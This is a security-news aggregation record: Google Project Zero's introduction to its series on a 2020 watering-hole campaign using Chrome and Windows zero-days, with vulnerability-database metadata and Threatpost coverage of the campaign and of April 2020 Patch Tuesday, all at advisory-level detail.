This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.
At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community’s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).
Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.
We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.
[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>)
From the exploit servers, we have extracted:
* Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
* Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
* A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.
The four 0-days discovered in these chains have been fixed by the appropriate vendors:
* [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) - Chrome vulnerability in TurboFan (fixed February 2020)
* [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) - Font vulnerability on Windows (fixed April 2020)
* [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) - Font vulnerability on Windows (fixed April 2020)
* [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) - Windows CSRSS vulnerability (fixed April 2020)
We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end user's device before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine which parameters selected the "fast" or "slow" exploitation path.
The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency and flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real-world, mature, and presumably well-resourced actor.
The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:
* Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
* A deep look into the bug class of one of the Chrome exploits, and
* An in-depth teardown of the Android post-exploitation code.
In addition, we are posting [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) for each of the four 0-days discovered as a part of these exploit chains.
Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting, and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well-resourced exploitation teams are doing in the real world) and what is publicly known.
We recommend reading the posts in the following order:
1. Introduction (this post)
2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)
3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)
4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)
5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)
6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)
This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).
{"id": "GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "vendorId": null, "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nIntroducing the In-the-Wild Series\n", "description": "This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.\n\nAt Project Zero we often refer to our goal simply as \u201cmake 0-day hard\u201d. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn\u2019t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community\u2019s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).\n\nTherefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor. \n\nWe discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. 
The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>)\n\nFrom the exploit servers, we have extracted:\n\n * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.\n * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.\n * A \u201cprivilege escalation kit\u201d composed of publicly known n-day exploits for older versions of Android.\n\nThe four 0-days discovered in these chains have been fixed by the appropriate vendors:\n\n * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) \\- Chrome Vulnerability in TurboFan (fixed February 2020)\n * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) \\- Windows CSRSS Vulnerability (fixed April 2020)\n\nWe understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. 
In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the \"fast\" or \"slow\" exploitation paths. \n\nThe Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.\n\nThe posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:\n\n * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,\n * A deep look into the bug class of one of the Chrome exploits, and\n * An in-depth teardown of the Android post-exploitation code.\n\nIn addition, we are posting [root cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four 0-days discovered as a part of these exploit chains. \n\nExploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. 
We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.\n\nWe recommend reading the posts in the following order:\n\n 1. Introduction (this post)\n 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\n 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)\n 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)\n 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)\n 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)\n\nThis is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. 
To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n", "published": "2021-01-12T00:00:00", "modified": "2021-01-12T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "immutableFields": [], "lastseen": "2022-08-25T01:57:26", "viewCount": 123, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202002-11"]}, {"type": "attackerkb", "idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "AKB:D1AE859F-1644-40D4-9203-7D8D97ABBB49", "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66"]}, {"type": "avleonov", "idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "cert", "idList": ["VU:354840"]}, {"type": "checkpoint_advisories", "idList": 
["CPAI-2020-0097", "CPAI-2020-0195", "CPAI-2020-0197", "CPAI-2020-0258"]}, {"type": "chrome", "idList": ["GCSA-2415374810976728715"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-0938", "CISA-KEV-CVE-2020-1020", "CISA-KEV-CVE-2020-1027", "CISA-KEV-CVE-2020-6418"]}, {"type": "cve", "idList": ["CVE-2020-0913", "CVE-2020-0938", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4638-1:8959D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-6418"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "fedora", "idList": ["FEDORA:6395E630FBA4", "FEDORA:C3C866194B96"]}, {"type": "gentoo", "idList": ["GLSA-202003-08"]}, {"type": "githubexploit", "idList": ["43EBEC21-E951-555D-B83D-6CE834F5BF3C", "6E95B9E1-979B-595D-A4F4-99125E6059E4", "D253294E-AE35-5B65-8B7D-17D007162D00"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200805-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11678", "KLA11722", "KLA11743", "KLA11744"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"]}, {"type": "mageia", "idList": ["MGASA-2020-0123"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-"]}, {"type": "mscve", "idList": ["MS:ADV200002", "MS:ADV200006", "MS:CVE-2020-0938", "MS:CVE-2020-1020", "MS:CVE-2020-1027"]}, {"type": "mskb", "idList": ["KB4550970"]}, {"type": "nessus", "idList": ["701270.PASL", "DEBIAN_DSA-4638.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-F6271D7AFA.NASL", "GENTOO_GLSA-202003-08.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "OPENSUSE-2020-259.NASL", "REDHAT-RHSA-2020-0738.NASL", "SMB_NT_MS20_APR_4549949.NASL", "SMB_NT_MS20_APR_4549951.NASL", "SMB_NT_MS20_APR_4550917.NASL", 
"SMB_NT_MS20_APR_4550922.NASL", "SMB_NT_MS20_APR_4550927.NASL", "SMB_NT_MS20_APR_4550929.NASL", "SMB_NT_MS20_APR_4550930.NASL", "SMB_NT_MS20_APR_4550951.NASL", "SMB_NT_MS20_APR_4550961.NASL", "SMB_NT_MS20_APR_4550964.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704638", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310816823", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310816825", "OPENVAS:1361412562310816826", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816828", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816830", "OPENVAS:1361412562310853048", "OPENVAS:1361412562310877601", "OPENVAS:1361412562310877632"]}, {"type": "osv", "idList": ["OSV:DSA-4638-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632", "PACKETSTORM:168068"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA"]}, {"type": "redhat", "idList": ["RHSA-2020:0738"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-6418"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1", "OPENSUSE-SU-2020:0259-1"]}, {"type": "thn", "idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:88098D30DA04E912B06C03B52556385C", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-6418"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-202002-11"]}, {"type": "attackerkb", "idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", 
"AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66"]}, {"type": "avleonov", "idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "cert", "idList": ["VU:354840"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0097", "CPAI-2020-0195", "CPAI-2020-0197", "CPAI-2020-0258"]}, {"type": "chrome", "idList": ["GCSA-2415374810976728715"]}, {"type": "cve", "idList": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4638-1:8959D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-6418"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "fedora", "idList": ["FEDORA:6395E630FBA4", "FEDORA:C3C866194B96"]}, {"type": "gentoo", "idList": ["GLSA-202003-08"]}, {"type": "githubexploit", "idList": ["6E95B9E1-979B-595D-A4F4-99125E6059E4", "D253294E-AE35-5B65-8B7D-17D007162D00"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200805-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11678", "KLA11722", "KLA11743", "KLA11744"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_JSCREATE_SIDEEFFECT"]}, {"type": "mscve", "idList": ["MS:ADV200002", "MS:ADV200006", "MS:CVE-2020-0938", "MS:CVE-2020-1020", "MS:CVE-2020-1027"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4638.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-F6271D7AFA.NASL", "GENTOO_GLSA-202003-08.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "OPENSUSE-2020-259.NASL", "REDHAT-RHSA-2020-0738.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704638", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310816823", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310816825", 
"OPENVAS:1361412562310816826", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816828", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816830", "OPENVAS:1361412562310853048", "OPENVAS:1361412562310877601", "OPENVAS:1361412562310877632"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-6418"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1", "OPENSUSE-SU-2020:0259-1"]}, {"type": "thn", "idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "THREATPOST:67BFCF521C762895A107ADC4CE661654", "THREATPOST:88098D30DA04E912B06C03B52556385C"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-6418"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}]}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1661392696, "score": 1661392800}, "_internal": {"score_hash": "c7a08755b223538f5ad00d9322df984c"}}
{"threatpost": [{"lastseen": "2021-01-13T17:23:32", "description": "Google researchers have detailed a major hacking campaign that was detected in early 2020, which mounted a series of sophisticated attacks, some using zero-day flaws, against [Windows](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>) and [Android](<https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/>) platforms.\n\nWorking together, researchers from [Google Project Zero](<https://threatpost.com/2-zero-day-bugs-google-chrome/161160/>) and the [Google Threat Analysis Group (TAG)](<https://blog.google/threat-analysis-group/>) uncovered the attacks, which were \u201cperformed by a highly sophisticated actor,\u201d Ryan from Project Zero wrote in the [first](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>) of a six-part blog series on their research.\n\n\u201cWe discovered two exploit servers delivering different exploit chains via watering-hole attacks,\u201d he wrote. \u201cOne server targeted Windows users, the other targeted Android.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nWatering-hole attacks target organizations\u2019 oft-used websites and inject them with malware, infecting and gaining access to victims\u2019 machines when users visit the infected sites.\n\nIn the case of the attacks that Google researchers uncovered, attackers executed the malicious code remotely on both the Windows and Android servers using Chrome exploits. 
The exploits used against Windows included [zero-day](<https://threatpost.com/apple-patches-bugs-zero-days/161010/>) flaws, while Android users were targeted with exploit chains using known \u201cn-day\u201d exploits, though they acknowledge it\u2019s possible zero-day vulnerabilities could also have been used, researchers said.\n\nThe team spent months analyzing the attacks, including examining what happened [post-exploitation on Android devices.](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) In that case, additional payloads were delivered that collected device fingerprinting information, location data, a list of running processes and a list of installed applications for the phone.\n\n## Zero-Day Bugs\n\nThe researchers posted [root-cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four Windows zero-day vulnerabilities that they discovered being leveraged in their attacks.\n\nThe first, [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/cve-2020-6418-chrome-incorrect-side.html>), is a type confusion bug prior to 80.0.3987.122 leading to remote-code execution. It exists in V8 in Google Chrome (Turbofan), which is the component used for processing JavaScript code. It allows a remote attacker to potentially cause heap corruption via a crafted HTML page.\n\nThe second, [CVE-2020-0938](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938>), is a a trivial stack-corruption vulnerability in the Windows Font Driver. It can be triggered by loading a Type 1 font that includes a specially crafted BlendDesignPositions object. In the attacks, it was chained with [CVE-2020-1020,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020>) another Windows Font Driver flaw, this time in the processing of the VToHOrigin PostScript font object, also triggered by loading a specially crafted Type 1 font. 
Both were used for privilege escalation.\n\n\u201cOn Windows 8.1 and earlier versions, the vulnerability was chained with [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1020>) (a write-what-where condition) to first set up a second stage payload in RWX kernel memory at a known address, and then jump to it through this bug,\u201d according to Google. \u201cThe exploitation process was straightforward because of the simplicity of the issue and high degree of control over the kernel stack. The bug was not exploited on Windows 10.\u201d\n\nAnd finally, [CVE-2020-1027](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027>) is a Windows heap buffer overflow in the Client/Server Run-Time Subsystem (CSRSS), which is an essential subsystem that must be running in Windows at all times. The issue was used as a sandbox escape in a browser exploit chain using, at times, all four vulnerabilities.\n\n\u201cThis vulnerability was used in an exploit chain together with a 0-day vulnerability in Chrome (CVE-2020-6418). For older OS versions, even though they were also affected, the attacker would pair CVE-2020-6418 with a different privilege escalation exploit (CVE-2020-1020 and CVE-2020-0938).\u201d\n\nAll have all since been patched.\n\n## Advanced Capabilities\n\nFrom their understanding of the attacks, researchers said that threat actors were operating a \u201ccomplex targeting infrastructure,\u201d though, curiously, they didn\u2019t use it every time.\n\n\u201cIn some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox,\u201d according to researchers. 
\u201cIn these cases, the attacker took a slower approach: sending back dozens of parameters from the end user\u2019s device, before deciding whether or not to continue with further exploitation and use a sandbox escape.\u201d\n\nStill other attack scenarios showed attackers choosing to fully exploit a system straightaway; or, not attempting any exploitation at all, researchers observed. \u201cIn the time we had available before the servers were taken down, we were unable to determine what parameters determined the \u2018fast\u2019 or \u2018slow\u2019 exploitation paths,\u201d according to the post.\n\nOverall, whoever was behind the attacks designed the exploit chains to be used modularly for efficiency and flexibility, showing clear evidence that they are experts in what they do, researchers said.\n\n\u201cThey [use] well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks,\u201d according to the post.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. 
Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-13T16:57:39", "type": "threatpost", "title": "Sophisticated Hacks Against Android, Windows Reveal Zero-Day Trove", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-13T16:57:39", "id": "THREATPOST:88098D30DA04E912B06C03B52556385C", "href": "https://threatpost.com/hacks-android-windows-zero-day/163007/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:51:25", "description": "Microsoft has released its April 2020 Patch Tuesday security updates, its first big patch update released since the [work-from-home era](<https://threatpost.com/malware-risks-triple-for-remote-workers/154735/>) truly got underway. It\u2019s a doozie, with the tech giant disclosing 113 vulnerabilities.\n\nOut of these, 19 are rated as critical, and 94 are rated as important. Crucially, four of the vulnerabilities are being exploited in the wild; and two of them were previously publicly disclosed.\n\nIn all, [the update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) includes patches for Microsoft Windows, Microsoft Edge (EdgeHTML-based and the Chromium-based versions), ChakraCore, Internet Explorer, Microsoft Office and Microsoft Office Services and Web Apps, Windows Defender, Visual Studio, Microsoft Dynamics, and Microsoft Apps for Android and Mac. 
They run the gamut from information disclosure and privilege escalation to remote code execution (RCE) and cross-site scripting (XSS).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft has seen a 44 percent increase year-over-year in the number of CVEs patched between January to April, according to Trend Micro\u2019s Zero Day Initiative (ZDI) \u2013 a likely result of an increasing number of researchers looking for bugs and an expanding portfolio of supported products. In March, Patch Tuesday [contained 115 updates](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>); in February, Microsoft [patched 99 bugs](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>); and in January, it [tackled 50 flaws](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>).\n\nAlso for this week, Oracle [patched a whopping 405 security vulnerabilities](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>) \u2013 while on the other end of the spectrum, Adobe went light, with [only five CVEs](<https://threatpost.com/adobe-fixes-important-flaws-in-coldfusion-after-effects-and-digital-editions/154780/>) addressed for April.\n\n**Bugs Under Active Exploit**\n\nOn the zero-day front, Microsoft patched [CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>), a critical-level memory-corruption vulnerability in Internet Explorer that was exploited in the wild. The bug allows RCE, and exists due to the improper handling of objects in memory by the scripting engine.\n\n\u201cThere are multiple scenarios in which this vulnerability could be exploited,\u201d Satnam Narang, principal research engineer at Tenable, told Threatpost. \u201cThe primary way would be to socially engineer a user into visiting a website containing the malicious code, whether owned by the attacker, or a compromised website with the malicious code injected into it. 
An attacker could also socially engineer the user into opening a malicious Microsoft Office document that embeds the malicious code.”

Chris Hass, director of information security and research for Automox, told Threatpost that CVE-2020-0968 is a perfect vulnerability for drive-by compromise.

